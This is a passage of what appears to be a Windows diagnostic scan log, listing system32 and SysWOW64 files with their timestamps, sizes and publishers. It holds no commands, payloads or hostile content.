- 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\shsetup.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00118784 _____ (Microsoft Corporation) C:\Windows\system32\wkssvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00117248 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00115200 _____ (Microsoft Corporation) C:\Windows\system32\WPDShServiceObj.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\QUTIL.DLL 2015-09-19 16:10 - 2010-11-20 15:27 - 00095232 _____ (Microsoft Corporation) C:\Windows\system32\regapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\TabSvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\nci.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\WUDFSvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\nlaapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\samcli.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\RpcRtRemote.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\rtutils.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00046592 _____ (Microsoft Corporation) C:\Windows\system32\msasn1.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\vpnikeapi.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 01457664 _____ (Microsoft Corporation) C:\Windows\system32\DxpTaskSync.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\DiagCpl.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 01066496 _____ (Microsoft Corporation) C:\Windows\system32\Display.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00861184 _____ (Microsoft Corporation) C:\Windows\system32\fontext.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00675328 _____ (Microsoft Corporation) C:\Windows\system32\DXPTaskRingtone.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00459776 _____ (Microsoft Corporation) C:\Windows\system32\DXP.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00355328 _____ (Microsoft Corporation) C:\Windows\system32\Faultrep.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00348160 _____ (Microsoft Corporation) C:\Windows\system32\eapp3hst.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00332288 _____ (Microsoft Corporation) C:\Windows\system32\hgcpl.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\eapphost.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00279552 _____ (Microsoft Corporation) C:\Windows\system32\dxdiagn.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00239616 _____ (Microsoft Corporation) C:\Windows\system32\dskquoui.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\defaultlocationcpl.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00232448 _____ (Microsoft Corporation) C:\Windows\system32\ListSvc.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\mprapi.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00217088 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00211456 _____ (Microsoft Corporation) C:\Windows\system32\mprddm.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\logoncli.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00162816 _____ (Microsoft Corporation) C:\Windows\system32\dps.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\dwmredir.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\dnscmmc.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00116224 _____ (Windows (R) Codename Longhorn DDK provider) C:\Windows\system32\fms.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\hbaapi.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\fdeploy.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\dot3cfg.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00057856 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\lsmproxy.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\mimefilt.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 03745792 _____ (Microsoft Corporation) C:\Windows\system32\accessibilitycpl.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 03524608 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 01264640 _____ (Microsoft Corporation) C:\Windows\system32\sdclt.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00974336 _____ (Microsoft Corporation) C:\Windows\system32\WFS.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00749568 _____ (Microsoft Corporation) C:\Windows\system32\batmeter.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\AuxiliaryDisplayCpl.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00349696 _____ (Microsoft Corporation) C:\Windows\system32\slui.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\clusapi.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00273920 _____ (Microsoft Corporation) C:\Windows\system32\SndVol.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00257024 _____ (Microsoft Corporation) C:\Windows\system32\taskmgr.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00207872 _____ (Microsoft Corporation) C:\Windows\system32\cfgmgr32.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00186368 _____ (Microsoft Corporation) C:\Windows\system32\ocsetup.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00168448 _____ (Microsoft Corporation) C:\Windows\system32\bcdsrv.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00158720 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\cabview.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00128000 _____ (Microsoft) C:\Windows\system32\Robocopy.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\AxInstSv.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00088576 _____ (Microsoft Corporation) C:\Windows\system32\setupcl.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\taskhost.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\rdpsign.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\proquota.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\userinit.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2015-09-19 16:10 - 2010-11-20 15:24 - 01538560 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00957440 _____ (Microsoft Corporation) C:\Windows\system32\mblctr.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00850944 _____ (Microsoft Corporation) C:\Windows\system32\mmsys.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00793088 _____ (Microsoft Corporation) C:\Windows\system32\autoconv.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00777728 _____ (Microsoft Corporation) C:\Windows\system32\autochk.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00763904 _____ (Microsoft Corporation) C:\Windows\system32\autofmt.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00684032 _____ (Microsoft Corporation) C:\Windows\system32\TabletPC.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00515584 _____ (Microsoft Corporation) C:\Windows\system32\timedate.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00359936 _____ (Microsoft Corporation) C:\Windows\system32\eudcedit.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00300032 _____ (Microsoft Corporation) C:\Windows\system32\msconfig.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOVER.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\mpg2splt.ax 2015-09-19 16:10 - 2010-11-20 15:24 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax 2015-09-19 16:10 - 2010-11-20 15:24 - 00217088 _____ (Microsoft Corporation) C:\Windows\system32\wdmaud.drv 2015-09-19 16:10 - 2010-11-20 15:24 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\Mpeg2Data.ax 2015-09-19 16:10 - 2010-11-20 15:24 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\WSTPager.ax 2015-09-19 16:10 - 2010-11-20 14:21 - 02983424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIRibbon.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 02311168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 02202624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsCpl.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 02157568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themecpl.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 02146304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncCenter.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 01624064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPEncEn.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 01326592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanpref.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 01227776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdc.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 01003008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMNetMgr.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00933376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Vault.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00850432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sbe.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00826368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00782336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webservices.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00778240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sqlsrv32.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00464896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scrptadm.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00458752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSDApi.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00416768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadefui.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00411648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlangpui.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00380416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sxs.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00372224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00363520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00352768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\termmgr.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00352256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpeffects.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00346624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\untfs.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00335872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSATAPI.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00328192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shsvcs.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00307712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scesrv.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00305152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskcomp.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00301568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srchadmin.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00276992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wcncsvc.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00246272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scansetting.dll |